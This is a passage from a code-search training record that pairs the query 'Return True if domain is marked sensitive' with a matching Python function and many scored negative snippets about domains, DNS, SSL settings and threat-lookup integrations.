datetime_from_timestamp(block.get(key)))\n else:\n print('\\t', block.get(key))\n #[{u'attributes': {u'total_votes': {u'harmless': 0, u'malicious': 0}, u'last_final_url': u'https://msg3.club/', u'tags': [], u'url': u'https://msg3.club/', u'last_analysis_date': 1551639858, u'last_analysis_stats': {u'harmless': 57, u'malicious': 1, u'suspicious': 0, u'undetected': 8, u'timeout': 0}, u'first_submission_date': 1551639858,\n self.last_analysis_results(block, args, kwargs)\n \"\"\"\n\n if kwargs.get('return_json'):\n return_json.update(self.__detected_samples(jdata, *args, **kwargs))\n else:\n return_json = self.__detected_samples(jdata, *args, **kwargs)\n\n if jdata.get('pcaps') and ((kwargs.get('pcaps') or 'pcaps' in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({'pcaps': jdata['pcaps']})\n else:\n print('\\n')\n pretty_print(jdata['pcaps'], ['pcaps'], [70], ['c'], kwargs.get('email_template'))\n\n if jdata.get('resolutions') and ((kwargs.get('resolutions') or 'resolutions' in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({'passive_dns': jdata['resolutions']['data']})\n else:\n print('\\n[+] Passive DNS replication\\n')\n pretty_print(jdata['resolutions']['data'],\n ['ip_address', 'type'],\n [25, 20],\n ['c', 'c'],\n kwargs.get('email_template')\n )\n\n if kwargs.get('walk') and jdata.get('resolutions', {}).get(\"data\", []):\n filter_ip = list()\n for ip in jdata['resolutions']['data']:\n ip = ip['id'].replace(domain, '')\n if ip not in filter_ip:\n print('\\n\\n[+] Checking data for ip: {0}'.format(ip))\n kwargs['value'] = ip\n self.getIP(**kwargs)\n\n if kwargs.get('dump') is True:\n md5_hash = hashlib.md5(name.encode(\"utf-8\")).hexdigest()\n jsondump(jdata, md5_hash)\n\n if kwargs.get('return_json'):\n return return_json", "def bucket_domain_name(self) -> typing.Optional[str]:\n return self._values.get('bucket_domain_name')", "def test_get_a_domain(self):\n\n self.assertIn('tld', self.powerglove.domains)\n self.assertIn('stable.tld', self.powerglove.domains)\n self.assertIn('super.stable.tld', self.powerglove.domains)\n\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.tld').name, \"tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.super.tld').name, \"tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.super.great.tld').name, \"tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.super.stable.great.tld').name, \"tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.stable.tld').name, \"stable.tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.very.stable.tld').name, \"stable.tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.super.stable.tld').name, \"super.stable.tld\")\n self.assertEqual(self.powerglove.get_a_domain_from_fqdn('host.very.super.stable.tld').name, \"super.stable.tld\")\n\n with self.assertRaises(PowergloveError):\n self.powerglove.get_a_domain_from_fqdn('host.unknowntld')", "def test_client_get_domain(mocker, client_domain_input):\n mocker.patch(\"tracker_client.client.get_auth_token\")\n mocker.patch(\"tracker_client.client.create_client\")\n test_client = Client()\n test_client.execute_query = mocker.MagicMock(return_value=client_domain_input)\n\n domain = test_client.get_domain(\"foo.bar\")\n\n test_client.execute_query.assert_called_once_with(\n queries.GET_DOMAIN, {\"domain\": \"foo.bar\"}\n )\n assert domain.domain_name == \"foo.bar\"\n assert domain.dmarc_phase == \"not implemented\"\n assert domain.last_ran == \"2021-01-27 23:24:26.911236\"\n assert domain.dkim_selectors == []", "def domain(self, domain):", "def get_domain_of_problem(problem_string):\n for line in problem_string.splitlines():\n # Skip empty lines.\n if re.match(r'^\\s*$', line):\n continue\n match = re.search('\\(:domain ([^)]+)\\)', line)\n if match:\n break\n assert match is not None, \\\n 'Could not extract domain name from ' \\\n 'first non-empty line \"{}\".'.format(line)\n return match.group(1)", "def check_domain_exists(domain):\r\n try:\r\n return socket.gethostbyname(domain)\r\n except socket.gaierror as exception:\r\n if exception.errno == -2:\r\n raise Exception('Unknown domain name: {}'.format(domain))\r\n else:\r\n raise", "def get_domain_from_path(post_path):\n return post_path.split('/', 1)[0]", "def domain_command():\n # 1. Get input host from Demisto\n domain = demisto.args().get('domain')\n # 2. Get the host reputation from SlashNext API\n response = domain_lookup(domain=domain)\n if response.get('errorNo') != 0:\n return\n # 3. Parse and format the response\n dbot_score_cont, domain_cont = get_dbot_std_context(\n domain, 'Domain', response.get('threatData').get('verdict'), response.get('threatData').get('threatType'))\n\n snx_ioc_cont = get_snx_host_ioc_context(domain, 'Domain', response.get('threatData'))\n\n ec = {\n 'SlashNext.Domain(val.Value === obj.Value)': snx_ioc_cont,\n 'DBotScore': dbot_score_cont,\n 'Domain': domain_cont\n }\n\n domain = domain.encode('idna')\n\n title = 'SlashNext Phishing Incident Response - Domain Lookup\\n' \\\n '##### domain = {}'.format(domain.decode())\n\n md = tableToMarkdown(\n title,\n snx_ioc_cont,\n ['Value',\n 'Type',\n 'Verdict',\n 'ThreatStatus',\n 'ThreatName',\n 'ThreatType',\n 'FirstSeen',\n 'LastSeen']\n )\n\n return_outputs(md, ec, snx_ioc_cont)", "def domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain\")", "def domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain\")", "def domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain\")", "def get_domains(self):\n\n response = self.call(method='getDomains')\n domains = []\n for d in response:\n domain = self.domain(domain=d['domain'])\n domains.append(domain)\n return domains" ]
[ "0.82388127", "0.7296342", "0.72872925", "0.71128905", "0.70768034", "0.7075855", "0.70597684", "0.69037956", "0.68828833", "0.6841402", "0.6727464", "0.65337366", "0.64684", "0.6401447", "0.63366103", "0.63004", "0.6292597", "0.62468135", "0.62434566", "0.62265456", "0.61929935", "0.6146508", "0.61198103", "0.6104366", "0.605911", "0.60484904", "0.60445577", "0.5989959", "0.59823364", "0.5974699", "0.5966888", "0.5927165", "0.5925513", "0.59150296", "0.591246", "0.59031725", "0.58928514", "0.5843648", "0.58194953", "0.58120215", "0.57978296", "0.57941365", "0.57804567", "0.5747359", "0.57413656", "0.57413656", "0.57380927", "0.57334787", "0.5730023", "0.5727436", "0.5725671", "0.5710491", "0.571049", "0.57054573", "0.56923956", "0.5688056", "0.5662557", "0.56622577", "0.5657124", "0.5644354", "0.56347644", "0.56150514", "0.5614598", "0.56019515", "0.5598817", "0.559386", "0.55858463", "0.55766326", "0.55766326", "0.55766326", "0.5573051", "0.5568764", "0.5562225", "0.5550071", "0.55496323", "0.5548903", "0.5548903", "0.5548903", "0.5548618", "0.55449146", "0.5543532", "0.5543532", "0.5534954", "0.55213004", "0.5519931", "0.5500839", "0.54964167", "0.5493008", "0.5488499", "0.54859674", "0.54846203", "0.54724854", "0.54690444", "0.5465723", "0.5460058", "0.5455842", "0.5455404", "0.5455404", "0.5455404", "0.54463786" ]
0.654201
11
Return True if domain is marked sensitive
def is_domain_sensitive(name): query = database.session_query(Domain) query = query.filter(and_(Domain.sensitive, Domain.name == name)) return database.find_all(query, Domain, {}).all()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def indomain(url, domain):\n if url and domain:\n return url.startswith(domain)\n return False", "def is_secure_site_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_secure_site_enabled\")", "def is_secure_site_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_secure_site_enabled\")", "def is_shared_with_domain(self):\n return self.has_label(SHAREDWITHDOMAIN_LABEL)", "def check_secure():\n return get_config_handler().check_secure()", "def domain_filter(self, url):\n return url_is_from_any_domain(url, self._domain)", "def filter_domain(name):\n def wrapped(request):\n \"\"\" Function used to filter request\n \"\"\"\n if request.environ.get('HTTP_HOST'):\n url = request.environ['HTTP_HOST']\n else:\n url = request.environ['SERVER_NAME']\n if url.lower() == name.lower():\n return True\n\n return False\n return wrapped", "def controlled(self):\n if self.crypt_private is not None and self.sign_private is not None:\n return True\n else:\n return False", "def condition_singleton(csp, var) :\n if len(csp.get_domain(var))==1:\n return True\n return False", "def condition_singleton(csp, var) :\n return len(csp.get_domain(var))==1", "def is_integral_domain(self):\n return False", "def captcha_protected(self):\n return settings.RECAPTCHA_ENABLE", "def captcha_protected(self):\n return settings.RECAPTCHA_ENABLE", "def captcha_protected(self):\n return settings.RECAPTCHA_ENABLE", "def _is_domain_allowed(email):\n domains = local_config.AuthConfig().get('whitelisted_domains', default=[])\n for domain in domains:\n if utils.normalize_email(email).endswith('@%s' % domain.lower()):\n return True\n\n return False", "def allow_bare_domains(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_bare_domains\")", "def secure(self) -> bool:\n return self.get_state(self.args[CONF_OVERALL_SECURITY_STATUS]) == \"Secure\"", "def is_active_domain(self, domain=\"www.google.com\", name_server='1.1.1.1'):\n my_resolver = dns.resolver.Resolver()\n my_resolver.nameservers = [name_server]\n my_resolver.timeout = 3\n my_resolver.lifetime = 3\n try:\n A = my_resolver.query(domain, 'A')\n for i in A.response.answer:\n for j in i.items:\n return self.is_actual_ip(str(j))\n except Exception as e:\n return None", "def option_domains_always_in_scope_enabled(self):\n return six.next(six.itervalues(self.zap._request(self.zap.base + 'spider/view/optionDomainsAlwaysInScopeEnabled/')))", "def allowed(self, request):\n try:\n sdn_enabled = stx_api.sysinv.get_sdn_enabled(request)\n return sdn_enabled\n except Exception:\n return False", "def allow_bare_domains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_bare_domains\")", "def allow_bare_domains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_bare_domains\")", "def insecure(self) -> bool:\n return self._insecure", "def _supports_domain(cls, domain):\n return domain in (ZZ, QQ)", "def filter_ssl(request):\n if request.scheme == 'https':\n return True\n else:\n return False", "def strict_host_key_checking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"strict_host_key_checking\")", "def strict_host_key_checking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"strict_host_key_checking\")", "def strict_host_key_checking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"strict_host_key_checking\")", "def https_only(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"https_only\")", "def https_only(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"https_only\")", "def https_only(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"https_only\")", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def ldap_over_tls(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ldap_over_tls\")", "def is_secured_cluster(self, services):\n return services and \"cluster-env\" in services[\"configurations\"] and\\\n \"security_enabled\" in services[\"configurations\"][\"cluster-env\"][\"properties\"] and\\\n services[\"configurations\"][\"cluster-env\"][\"properties\"][\"security_enabled\"].lower() == \"true\"", "def is_secure_transport(request: Request) -> bool:\n if request.settings.INSECURE_TRANSPORT:\n return True\n return request.url.lower().startswith(\"https://\")", "def allow_glob_domains(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_glob_domains\")", "def allow_subdomains(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_subdomains\")", "def enable_ssl_verification(self) -> bool:\n return pulumi.get(self, \"enable_ssl_verification\")", "def option_domains_always_in_scope(self):\n return six.next(six.itervalues(self.zap._request(self.zap.base + 'spider/view/optionDomainsAlwaysInScope/')))", "def get_secured():\n return jsonify({'isSecured': config.requires_auth()})", "def caseSensitive(self):\n return self.__caseSensitive", "def api_domain(self) -> bool:\n return self.__api_domain", "def hide_satellite_managed():\n try:\n return strtobool(connexion.request.headers.get('Hide-Satellite-Managed', 'false'))\n except ValueError:\n return False", "def host_valid_strict(self, host: str) -> bool:\n host = host[4:] if host.startswith('www.') else 'www.' + host\n return host in self.root_domains", "def __cookieFilter(self, request):\n if not self.__loaded:\n self.__load()\n \n if self.__acceptCookies == self.AcceptNever:\n res = self.__isOnDomainList(self.__exceptionsAllow,\n request.origin.host())\n if not res:\n return False\n \n if self.__acceptCookies == self.AcceptAlways:\n res = self.__isOnDomainList(self.__exceptionsBlock,\n request.origin.host())\n if res:\n return False\n \n if (\n self.__acceptCookies == self.AcceptOnlyFromSitesNavigatedTo and\n request.thirdParty\n ):\n return False\n \n return True", "def allow_subdomains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_subdomains\")", "def allow_subdomains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_subdomains\")", "def verify_request(self, request, client_address):\n\n\t\tglobal configurer\n\n\t\treturn NetworkRender.allowedAddress(self.ip, client_address[0],\n\t\t\t\t\t\t\t\t\t\tconfigurer.get('ServerSecureNets'))", "def is_secure(self):\n return self._is_ssl or self._is_socket", "def whitelist_domains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"whitelist_domains\")", "def whitelist_domains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"whitelist_domains\")", "def is_private(self):\n if self[:13] == '1.2.840.10008':\n return False\n\n return True", "def verify_privileged(self):\n community_text = self.fetch(self.base_url + \"/community\")\n return \"You must be logged in to see this page.\" not in community_text", "def allow_glob_domains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_glob_domains\")", "def allow_glob_domains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_glob_domains\")", "def xforwardedforclientcert_issuerdnenabled(self) -> bool:\n return pulumi.get(self, \"xforwardedforclientcert_issuerdnenabled\")", "def __matchDomain(self, cookieDomain, siteDomain):\n if not siteDomain:\n # empty URLs always match\n return True\n \n if cookieDomain.startswith(\".\"):\n cookieDomain = cookieDomain[1:]\n if siteDomain.startswith(\".\"):\n siteDomain = siteDomain[1:]\n \n if cookieDomain == siteDomain:\n return True\n \n if not siteDomain.endswith(cookieDomain):\n return False\n \n index = siteDomain.find(cookieDomain)\n return index > 0 and siteDomain[index - 1] == \".\"", "def ssl(self) -> Optional[bool]:\n return pulumi.get(self, \"ssl\")", "def insecure_ssl(self):\n # type: () -> bool\n return self._insecure_ssl", "def is_internal_relay(request, public_key):\n if (settings.DEBUG or\n request.META.get('REMOTE_ADDR', None) in settings.INTERNAL_IPS or\n public_key in settings.SENTRY_RELAY_WHITELIST_PK):\n return True\n return False", "def test_not_on_same_domain(self):\n self.assertFalse(on_same_domain(\n \"https://google.com\",\n \"https://google.goggle.com/google.com/google\"\n ))", "def https_in_url(url):\n return True if url.startswith('https://') else False", "def is_authenticated(self):\n return self.ping() is not None", "def match_or_trust(self, host, der_encoded_certificate):\n raise NotImplementedError()", "def ldap_signing(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ldap_signing\")", "def filter_nossl(request):\n if request.scheme == 'http':\n return True\n else:\n return False", "def protected(self) -> bool:\n return pulumi.get(self, \"protected\")", "def enable_dns64(self) -> bool:\n return pulumi.get(self, \"enable_dns64\")", "def relevant_domains(self):\n pass", "async def protection_enabled(self) -> bool:\n response = await self._request(\"status\")\n return response[\"protection_enabled\"]", "def is_forwarded(self):\n return bool(re.match(FW_PATTERNS, self.header('Subject', '')))", "def _is_sriov_enabled(self):\n return (self._get_bios_setting('Sriov') == 'Enabled')", "def x_forwarded_for_client_cert_issuer_dn_enabled(self) -> Optional[bool]:\n return pulumi.get(self, \"x_forwarded_for_client_cert_issuer_dn_enabled\")", "def auth_domain(request):\n return request.registry.settings.get('h.auth_domain', request.domain)", "def domain(self, domain):", "def get_disable_public_fqdn(self) -> bool:\n return self._get_disable_public_fqdn(enable_validation=True)", "def http_auth_allowed(request):\n\n if request.method not in ('GET', 'HEAD'):\n return False\n if not request.is_secure() and not settings.DEBUG:\n return False\n\n ua = request.META.get('HTTP_USER_AGENT', '')\n if HTTP_AUTH_USER_AGENT.match(ua):\n return True\n else:\n return False", "def use_public_dns(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_public_dns\")", "def is_domain(value):\n result = any(check.isalpha() for check in value)\n return result", "def whitelist_domains(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"whitelist_domains\")", "def require_ssl(self) -> bool:\n return pulumi.get(self, \"require_ssl\")", "def is_subject_case_sensitive(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_subject_case_sensitive\")", "def test_acme_enabled_in_generated_config_domain_provided(self):\n conf = TestConfig()\n conf.read_config(\n yaml.safe_load(\n TestConfig().generate_config(\n \"/config_dir_path\",\n \"my_super_secure_server\",\n \"/data_dir_path\",\n tls_certificate_path=\"/tls_cert_path\",\n tls_private_key_path=\"tls_private_key\",\n acme_domain=\"my_supe_secure_server\", # This is the acme_domain\n )\n ),\n \"/config_dir_path\",\n )\n\n self.assertTrue(conf.acme_enabled)", "def host_valid_lenient(self, host: str) -> bool:\n return WebCrawler.resolve_domain(host) in self.root_domains", "def IsPriviledgedDomainUser(email):\n if email and '@' in email:\n _, user_domain = email.split('@', 1)\n return user_domain in settings.priviledged_user_domains\n\n return False", "def auth_domain(self):\n return self.__auth_domain", "def allow_ip_sans(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")", "def _is_https_enabled(dbapi):\n if dbapi is None:\n return False\n system = dbapi.isystem_get_one()\n return system.capabilities.get('https_enabled', False)", "def pcap_contains_priv_ips(self):\n return self.contains_priv_ips", "def is_original(self):\n return is_original(self.subdomain, self.record_id)", "def ssl(self):\n return self.protocol != \"SASL_PLAINTEXT\"", "def isSiteSyndicationAllowed(self):\n return self.enabled", "def case_sensitive(self):\n\n return True", "def test_link_is_tracked_false_not_domain(self):\n self.assertFalse(link_is_tracked(\"https://thisisatest.com/\"))", "def _check_domain_already_exists_on_san_certs(self, domain_name):\n\n found = False\n found_cert = None\n for san_cert_name in self.san_cert_cnames:\n sans = utils.get_sans_by_host_alternate(\n '.'.join(\n [\n san_cert_name,\n self.driver.akamai_https_access_url_suffix\n ]\n )\n )\n if domain_name in sans:\n found = True\n found_cert = san_cert_name\n break\n\n return found, found_cert", "def know_secret(self):\r\n return(self.secret != \"\") and (self.key != \"\")", "def verify_server_certificate(self):\n return self._verify_server_certificate", "def is_ssl(self):\n return self._is_ssl", "def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")", "def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")" ]
[ "0.5945297", "0.5943389", "0.5943389", "0.58801776", "0.5860374", "0.5823208", "0.58100474", "0.5775172", "0.57475305", "0.57442623", "0.57067436", "0.56709236", "0.56709236", "0.56709236", "0.56595856", "0.56003463", "0.55976045", "0.5583748", "0.5570339", "0.5522135", "0.5515378", "0.5515378", "0.5505999", "0.5490891", "0.54883003", "0.5410126", "0.5410126", "0.5410126", "0.53990966", "0.53990966", "0.53990966", "0.53983855", "0.53854847", "0.5376952", "0.536806", "0.535918", "0.535591", "0.5353072", "0.53308517", "0.5328432", "0.5324344", "0.5323078", "0.5309566", "0.52861387", "0.52853173", "0.5283083", "0.5283083", "0.5271097", "0.5251491", "0.5225787", "0.5225787", "0.5217423", "0.52013975", "0.5171926", "0.5171926", "0.517003", "0.51642644", "0.516412", "0.5158139", "0.51404136", "0.5124436", "0.5118156", "0.51123977", "0.5112296", "0.5108052", "0.5107305", "0.51070935", "0.50977093", "0.5095138", "0.50937885", "0.50912493", "0.508518", "0.50795174", "0.5070356", "0.5065957", "0.50537205", "0.50250447", "0.5021282", "0.5019958", "0.5019867", "0.50190675", "0.501853", "0.50152856", "0.50105643", "0.50065404", "0.5006147", "0.5002671", "0.49956432", "0.49925447", "0.497911", "0.4977031", "0.49751142", "0.49706233", "0.4969548", "0.49665666", "0.49645495", "0.49601236", "0.49576476", "0.4955801", "0.4955801" ]
0.7324499
0
Create a new domain
def create(name, sensitive): domain = Domain(name=name, sensitive=sensitive) return database.create(domain)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_domain(DomainName=None):\n pass", "def create_domain(self, domain: str) -> Session:\n uri = f\"{self.uri}/domains\"\n data = {\n \"hostname\": domain\n }\n response = self.request(uri=uri, method=\"POST\", data=data)\n\n return response", "def create_domain(self, domain_name):\r\n params = {'DomainName':domain_name}\r\n d = self.get_object('CreateDomain', params, Domain)\r\n d.name = domain_name\r\n return d", "def create_domain(domain_id, default_role):\n tx = iroha.transaction(\n [iroha.command(\"CreateDomain\", domain_id=domain_id, default_role=\"user\")]\n )\n ic.sign_transaction(tx, user_private_key)\n send_transaction_print_status_and_return_result(tx)", "def create_domain(self, domain_name):\n params = {'DomainName': domain_name}\n d = self.get_object('CreateDomain', params, Domain)\n d.name = domain_name\n return d", "def create_keystone_v3_domain(self, **kwargs):\n LOG_OBJ.debug(\"Creating the domain.\")\n print self.project_info\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains\"\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n\n _domain_info = {\"domain\": {}}\n for argument in [\"name\", \"description\", \"enabled\", \"disabled\"]:\n try:\n _domain_info['domain'].update(\n {argument: kwargs[argument]})\n except KeyError:\n pass\n _body = json.dumps(_domain_info)\n response = self.request(\"POST\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while creating domain\")\n print (\"No response from Server while creating domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\" Creating domain Failed with status %s \"\n \"and error : %s\" % (response.status, response.data))\n print (\" Creating domain Failed with status %s and error : %s \" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Domain details : %s \" % output)\n print (\"Domain details : %s \" % output)\n return output['domain']['id']", "def createDomain(schemaName, domain):\n return \"\"\"CREATE DOMAIN \\\"{schema_name}\\\".\\\"{domain_name}\\\" AS {type_name}\"\"\".format(\n schema_name = schemaName,\n domain_name = domain.name,\n type_name = getType(domain)\n )", "def create_domain(self, url_data, service_id, service_version):\n request_dict = {k: v[0] for k, v in url_data}\n domain_name = request_dict['name']\n\n create_domain = {\n 'comment': '',\n 'service_id': service_id,\n 'version': service_version,\n 'name': domain_name}\n\n if 'domain_list' not in self.fastly_cache[service_id]:\n self.fastly_cache[service_id]['domain_list'] = []\n\n self.fastly_cache[service_id]['domain_list'].append(\n [create_domain, 'None', 'False'])\n return create_domain", "def create(self, domain, master=True, **kwargs):\n params = {\n \"domain\": domain,\n \"type\": \"master\" if master else \"slave\",\n }\n params.update(kwargs)\n\n result = self.client.post(\"/domains\", data=params)\n\n if not \"id\" in result:\n raise UnexpectedResponseError(\n \"Unexpected response when creating Domain!\", json=result\n )\n\n d = Domain(self.client, result[\"id\"], result)\n return d", "def createDomain(self):\n if not self.rank:\n logging.info('Creating domain')\n\n if 'box' in self.pargs:\n self.lmp.command('region domain block ' + ('{} ' * len(self.pargs['box'])).format(*self.pargs['box']) + ' units box volume_limit 1e-20')\n elif 'cylinder' in self.pargs:\n self.lmp.command('region domain cylinder ' + ('{} ' * len(self.pargs['cylinder'])).format(*self.pargs['cylinder']) + ' units box volume_limit 1e-20') \n\n self.lmp.command('create_box {} domain'.format(self.pargs['nSS']))", "def CreateDomain(self, request):\n try:\n params = request._serialize()\n headers = request.headers\n body = self.call(\"CreateDomain\", params, headers=headers)\n response = json.loads(body)\n model = models.CreateDomainResponse()\n model._deserialize(response[\"Response\"])\n return model\n except Exception as e:\n if isinstance(e, TencentCloudSDKException):\n raise\n else:\n raise TencentCloudSDKException(type(e).__name__, str(e))", "def create(self, domain, active=True):\n url = self._api_url\n data = {\n \"name\": domain, \"description\": \"created by REST API\", \"active\": active,\n \"delegations\":[{\"orgId\":6125,\"certTypes\":[\"SSL\"]}]\n }\n result = self._client.post(url, data=data)", "def post_domain_create(self, resource_dict):\n pass", "def create_domain(self, domain_name, check=True):\n domain = self._client.create(domain_name)\n\n if check:\n self.check_domain_presence(domain)\n\n return domain", "def test_create_email_domain(self):\n email_dom = 'create.domain.loc'\n org = 'o=%s' % (self.org_name)\n dn = '%s,%s' % (org, self.base_dn)\n dn_info = {self.smtp_domain: [self.email_dom, email_dom]}\n expected_result = [(dn, dn_info)]\n domain = SpokeEmailDomain(self.org_name)\n result = domain.create(email_dom)['data']\n self.assertEqual(result, expected_result)", "def createManagedDomain():\n selectCustomTemplate(localTemplate)\n loadTemplates()\n # set the Node Manager listen address and listen port.\n cd('/')\n cd('NMProperties')\n set('ListenAddress', hostname)\n #create the domain\n writeDomain(domainPath)", "def Create(self, domainsList) :\n\t\t...", "def create(self):\n\n if self.call(method='addSubdomain', args=[self.domainname, self.subdomain]):\n return self", "def add_new_domain(self):\n\n domain = self.dlg.uComboBoxDomain.currentText()\n\n if domain in self.domains:\n self.dlg.uWarningSettings.show()\n self.dlg.uWarningSettings.setText(\n \"Warning: Domains must be unique. \" \"Please edit the domain below\"\n )\n return\n\n if len(self.domains) >= 10:\n self.dlg.uWarningSettings.show()\n self.dlg.uWarningSettings.setText(\n \"Warning: You can only store up to . \" \"10 domain entries\"\n )\n return\n\n if domain == \"OTHER\":\n domain = \"\"\n getattr(self.dlg, \"uTextDomain{0}\".format(len(self.domains) + 1)).setText(\n domain\n )\n getattr(self.dlg, \"uTextDomain{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uTextAPIKey{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uBtnRemoveDomain{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uBtnSaveDomain{0}\".format(len(self.domains) + 1)).show()\n self.dlg.uWarningSettings.hide()", "def setup_domain(domain):\n bucket = BUCKET_MANAGER.get_bucket(domain)\n\n zone = DOMAIN_MANAGER.find_hosted_zone(domain) \\\n or DOMAIN_MANAGER.create_hosted_zone(domain)\n\n endpoint = util.get_endpoint(BUCKET_MANAGER.get_region_name(bucket))\n a_record = DOMAIN_MANAGER.create_s3_domain_record(zone, domain, endpoint)\n print(\"Domain configure: http://{}\".format(domain))\n print(\"A record created: {}\".format(a_record))", "def add_domain():\n\n today = date.today()\n\n if request.method == \"POST\":\n # Check to see if domain already exists because\n # duplicate domain names aren't allowed\n domain = session.query(Domain).filter_by(\n domain_name=request.form[\"domain-name\"]).first()\n if domain:\n message = \"{}Error!{} {}{}{} already exists.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message, \"danger\")\n return redirect(url_for(\"add_domain\", today=today,\n category_names=category_names))\n\n # Find existing Provider otherwise create new Provider object\n provider = session.query(Provider).filter(\n Provider.provider_url == request.form[\"provider-url\"]).first()\n if not provider:\n provider = Provider(provider_url=request.form[\"provider-url\"])\n\n # Get existing category name object from CategoryName table\n category_name = session.query(CategoryName).filter(\n CategoryName.name == request.form[\"category\"]).first()\n\n domain = Domain(\n category=Category(),\n domain_name=request.form[\"domain-name\"],\n ip=request.form[\"ip-address\"],\n provider=provider)\n domain.category.category_name = category_name\n domain.status.append(Status(status_type=\"added\"))\n domain.is_active = request.form.get(\"is-active\", False)\n domain.is_monitored = request.form.get(\"is-monitored\", False)\n\n # Convert date string from form to date object\n exp_date = datetime.strptime(request.form.get(\"exp-date\"),\n \"%Y-%m-%d\").date()\n domain.exp_date = exp_date\n\n session.add(domain)\n\n try:\n session.commit()\n message = \"{}Success!{} Added {}{}{} successfully.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message , \"success\")\n except:\n session.rollback()\n message = \"{}Error!{} Could not add add {}{}{}.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message, \"danger\")\n\n if request.form[\"submit\"] == \"Submit\":\n return redirect(url_for(\"home\"))\n else:\n return redirect(url_for(\"add_domain\", today=today,\n category_names=category_names))\n else:\n return render_template(\"add_domain.html\", today=today,\n category_names=category_names)", "def set_keystone_v3_domain(self, **kwargs):\n LOG_OBJ.debug(\"Creating the domain.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains/\" + \\\n str(kwargs['domain_id'])\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n\n _domain_info = {\"domain\": {}}\n for argument in [\"name\", \"description\", \"enabled\", \"disabled\"]:\n try:\n _domain_info['domain'].update(\n {argument: kwargs[argument]})\n except KeyError:\n pass\n _body = json.dumps(_domain_info)\n response = self.request(\"PATCH\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while set the domain\")\n print (\"No response from Server while set the domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Set domain Failed with status %s and error : %s\" %\n (response.status, response.data))\n print (\"Set domain Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n return True", "def test_create_domain_only(self):\n fake_dns_instance = FakeDnsInstance()\n t = template_format.parse(domain_only_template)\n instance = self._setup_test_cloud_dns_instance('dnsinstance_create', t)\n create_args = self.create_domain_only_args\n self._stubout_create(instance, fake_dns_instance, **create_args)\n scheduler.TaskRunner(instance.create)()\n self.assertEqual((instance.CREATE, instance.COMPLETE), instance.state)\n self.m.VerifyAll()", "def create_zone(self, domain, type=\"master\", ttl=None, extra=None):\n if type == \"master\":\n _type = 0\n elif type == \"slave\":\n _type = 1\n if extra:\n dyn = 